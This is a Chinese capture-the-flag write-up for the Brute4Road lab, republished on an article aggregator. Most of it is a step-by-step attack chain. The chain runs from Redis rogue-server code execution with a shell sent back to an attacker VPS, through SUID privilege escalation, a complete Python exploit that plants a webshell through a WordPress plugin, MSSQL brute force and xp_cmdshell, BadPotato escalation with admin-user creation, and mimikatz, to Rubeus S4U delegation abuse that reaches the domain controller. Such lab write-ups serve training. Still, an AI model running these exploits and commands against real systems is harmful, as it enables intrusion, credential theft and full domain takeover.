WP-春秋云镜-Brute4Road靶场通关完全指南

2024-02-12 02:30

本文主要是介绍WP-春秋云镜-Brute4Road靶场通关完全指南,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Flag1

废话不多说,开启靶场给了个IP
Fscan扫一波
发现了Redis未授权,之前写过一篇文章阐述过Redis未授权的四种利用方式
Redis未授权四种利用方式
在这里插入图片描述在这里插入图片描述先使用写入ssh认证方式看是否可以写入
config set dir /root/.ssh
提示权限不够,则直接考虑主从模式获取rce
这里使用redis-rogue-server获取rce

git clone https://github.com/n0b0dyCN/redis-rogue-server.git
python3 redis-rogue-server.py --rhost 47.92.212.201 --lhost 38.47.100.xxxx # lhost是你vps的地址

在这里插入图片描述
上图注释掉的是vps地址,监听8888端口,然后在弹回的shell执行python伪终端
python -c ‘import pty; pty.spawn(“/bin/bash”)’
在这里插入图片描述
成功获取shell
在redis目录下发现了flag01,但是查看权限不够,需要提权
在这里插入图片描述

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述发现base64存在root权限
在这里插入图片描述
flag01: flag{2eca9677-7e51-49be-a0b3-axxxxxxx}

flag02

传frp,将流量代出来

在这里插入图片描述挂全局代理
在这里插入图片描述对172.22段进行扫描
在这里插入图片描述看结果,有两个kennel可以利用,mssql和wordpress
使用wpscan扫描wordpress站点
发现公开漏洞
https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

import sysimport binasciiimport requests# This is a magic string that when treated as pixels and compressed using the png# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png filepayload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'def encode_character_code(c: int):return '{:08b}'.format(c).replace('0', 'x')text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]destination_url = 'http://172.22.2.18/'cmd = 'ls'# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.requests.get(f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php")# We have uploaded a webshell - now let's use it to execute a command.print(requests.post(f"{destination_url}webshell.php?1=system", data={"2": cmd}).content.decode('ascii', 'ignore'))

写入webshell
在这里插入图片描述在这里插入图片描述查看数据库配置文件
在这里插入图片描述连接数据库获得flag2
在这里插入图片描述

flag03

在上一个数据库中发现了password字典,把字典拉下来,用来爆破下mssql
暴力破解获得了mssql的账户密码

在这里插入图片描述连接进入,打开xp_cmdshell

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' #返回1即存在
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; #启用cmdshell
exec master..xp_cmdshell 'whoami' #执行命令

在这里插入图片描述Ladon48.exe BadPotato “whoami” #提权
在这里插入图片描述创建新用户
在这里插入图片描述C:/迅雷下载/Ladon48.exe BadPotato "net localgroup administrators test /add" # 加到管理组
远程桌面连接进入
在这里插入图片描述

在administrators目录下发现flag03
在这里插入图片描述

flag04

进行信息收集,发现存在域
在这里插入图片描述
ping域即可定位域控在172.22.2.3
在这里插入图片描述上mimikatz读密码
看是否可以读到域用户密码

在这里插入图片描述使用Rubeus申请访问自身的可转发服务票据
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt
在这里插入图片描述

通过Rubeus的S4U2Self协议代表域管理员申请针对域控LDAP服务的票据并注入内存
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1AkncvWu9Oq61AalKFDmotwRbaGa1WWfrl3/5ylhbJrec4y9oTKUHqv2FndcyFONaFAAx3HiYxOUKQgOhNA+U2OgZHS6TjsAnpoK4Z0kMmFKRWy7gPWyUpC2x0vxSHXRvp1nwSVeupp6Ky5aAn7qwQpZ+73V0Vvrih0iNc3QfPHDU2TAVOBue5BCdbFIwg6qW/4fubvq5kYGutWAppskvt6kTIIVgBobF+ngdNsouAT4QIIqUT0ok/Oepw6UpY56DSwwydOkzoUX7Jzx6V+ddRKFB7PJDejSvnxoi95D+QKSCsq7cFyerZUYTTfFf6vp2fEYeNlfHRo/kdpNPKcGGK+lrV6FA/F0PhtXdc2eWY4TKL8cZ1qwlKiZocDyXk0ZYBeEzT3PdhZNw5FQFRnYi47eVgi9/zTXZ/vgRgL9QWlp5WkAcebgJmkjWhc2I3RXmJJlxgQxufVjG6PRi1b6kOa0evnYVCFs9qAOPkBti8YMqVeSfvseu8BVqQfMEVCa1Tb9zo5XJ6ej3nI5zJkLSkO1ZLgw7qd9bsLxzi0RGQLqc03ZYsYIIKuMPfp0E+pB1cjQwDOBdUbru/zOGzJ7w9kgp7bUHex2V+4rtHwNPGmVgfiHCV+qSXTIADhWbbpenZi48CtTETS0iqNw3Z/kN0+vD1HbwduDP6HK9Bro/gzbJ640gksqQUhpCTGPSlkexam5z2af3hivn6XYwHgTnXtq7N1JKY7+jKV0qn2QkVL/SBr/I7j/WNg6Ffqr10eBdNlfQqpvlYBt1lIfp/4avyWo6zacie6zp3+i7ZSl9UA5lhlkpkZpl14wlGGZgw2fbaRce3E9j/HOHfg8LcBQGAnV0BrPWd/EZCkXU42TzGIZVAm38WLmQB9e40LVgkPTRiJi091pxuRlIVHZDIg7UepmLRIo3Vv/Js1d2x/hfXiXoqHq+BKDyVZbx7U76heewAp/1UUTLE8+A0jUV63tjM/uz9kR/qaKDjBbWGeXWMHjlw9m6fBd4n0WgzZIXVQurDcfs7ZjGZbIApAI414UN8AdERD0HPCMa99qRF0un2MLfwFP3aptuSdau3qPK6PkgBrBTJSEBsq5hwddRlxJPnTjkM8iIn4G9dvrWZdENeBHBPVDg6f0gfoNqswaOMYZSVqBc9csdZ3ZD6XsCOu/80cVgWKrNOvXsjVGjUfXMKyid+O9FavYrSMMFqg6XlIjA3aRZ1frSxAj9dowz2zoK+bh/NmxFSlaQ9Yxe94HViw5UlDwAxxlezIyCJsCXdMZjlM1+qPVaJ9D/1ko/STJ5zZhhnWgncH5HA71IamhCa7UDTVZhdSr3EmvOIvyHzO8DICPcMgJ/Qw6MxPmjoLg68PnFqrsg9qFVtGkk32e+rEQneZd7YjJSIHR5Z0Mnt31rNquvprsjWuXJLaQyH33iaKyIZZifKU8LMVeQQ1nJF5NiZNdEi9Cgg9r5SuHWjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBDrHzkTjelV3zTu2oS5aKgSoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDEwMzA5NTczMFqmERgPMjAyMzAxMDMxOTU3MzBapxEYDzIwMjMwMTEwMDk1NzMwWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
在这里插入图片描述
之后执行
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
即可看见flag04
在这里插入图片描述

这篇关于WP-春秋云镜-Brute4Road靶场通关完全指南的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/701450

相关文章

在React中引入Tailwind CSS的完整指南

《在React中引入TailwindCSS的完整指南》在现代前端开发中,使用UI库可以显著提高开发效率,TailwindCSS是一个功能类优先的CSS框架,本文将详细介绍如何在Reac... 目录前言一、Tailwind css 简介二、创建 React 项目使用 Create React App 创建项目

SpringBoot3实现Gzip压缩优化的技术指南

《SpringBoot3实现Gzip压缩优化的技术指南》随着Web应用的用户量和数据量增加,网络带宽和页面加载速度逐渐成为瓶颈,为了减少数据传输量,提高用户体验,我们可以使用Gzip压缩HTTP响应,... 目录1、简述2、配置2.1 添加依赖2.2 配置 Gzip 压缩3、服务端应用4、前端应用4.1 N

使用Jackson进行JSON生成与解析的新手指南

《使用Jackson进行JSON生成与解析的新手指南》这篇文章主要为大家详细介绍了如何使用Jackson进行JSON生成与解析处理,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录1. 核心依赖2. 基础用法2.1 对象转 jsON(序列化)2.2 JSON 转对象(反序列化)3.

Java利用JSONPath操作JSON数据的技术指南

《Java利用JSONPath操作JSON数据的技术指南》JSONPath是一种强大的工具,用于查询和操作JSON数据,类似于SQL的语法,它为处理复杂的JSON数据结构提供了简单且高效... 目录1、简述2、什么是 jsONPath?3、Java 示例3.1 基本查询3.2 过滤查询3.3 递归搜索3.4

Spring Boot结成MyBatis-Plus最全配置指南

《SpringBoot结成MyBatis-Plus最全配置指南》本文主要介绍了SpringBoot结成MyBatis-Plus最全配置指南,包括依赖引入、配置数据源、Mapper扫描、基本CRUD操... 目录前言详细操作一.创建项目并引入相关依赖二.配置数据源信息三.编写相关代码查zsRArly询数据库数

SpringBoot启动报错的11个高频问题排查与解决终极指南

《SpringBoot启动报错的11个高频问题排查与解决终极指南》这篇文章主要为大家详细介绍了SpringBoot启动报错的11个高频问题的排查与解决,文中的示例代码讲解详细,感兴趣的小伙伴可以了解一... 目录1. 依赖冲突:NoSuchMethodError 的终极解法2. Bean注入失败:No qu

JavaScript错误处理避坑指南

《JavaScript错误处理避坑指南》JavaScript错误处理是编程过程中不可避免的部分,它涉及到识别、捕获和响应代码运行时可能出现的问题,本文将详细给大家介绍一下JavaScript错误处理的... 目录一、错误类型:三大“杀手”与应对策略1. 语法错误(SyntaxError)2. 运行时错误(R

Python使用date模块进行日期处理的终极指南

《Python使用date模块进行日期处理的终极指南》在处理与时间相关的数据时,Python的date模块是开发者最趁手的工具之一,本文将用通俗的语言,结合真实案例,带您掌握date模块的六大核心功能... 目录引言一、date模块的核心功能1.1 日期表示1.2 日期计算1.3 日期比较二、六大常用方法详

MySQL中慢SQL优化方法的完整指南

《MySQL中慢SQL优化方法的完整指南》当数据库响应时间超过500ms时,系统将面临三大灾难链式反应,所以本文将为大家介绍一下MySQL中慢SQL优化的常用方法,有需要的小伙伴可以了解下... 目录一、慢SQL的致命影响二、精准定位问题SQL1. 启用慢查询日志2. 诊断黄金三件套三、六大核心优化方案方案

使用Python高效获取网络数据的操作指南

《使用Python高效获取网络数据的操作指南》网络爬虫是一种自动化程序,用于访问和提取网站上的数据,Python是进行网络爬虫开发的理想语言,拥有丰富的库和工具,使得编写和维护爬虫变得简单高效,本文将... 目录网络爬虫的基本概念常用库介绍安装库Requests和BeautifulSoup爬虫开发发送请求解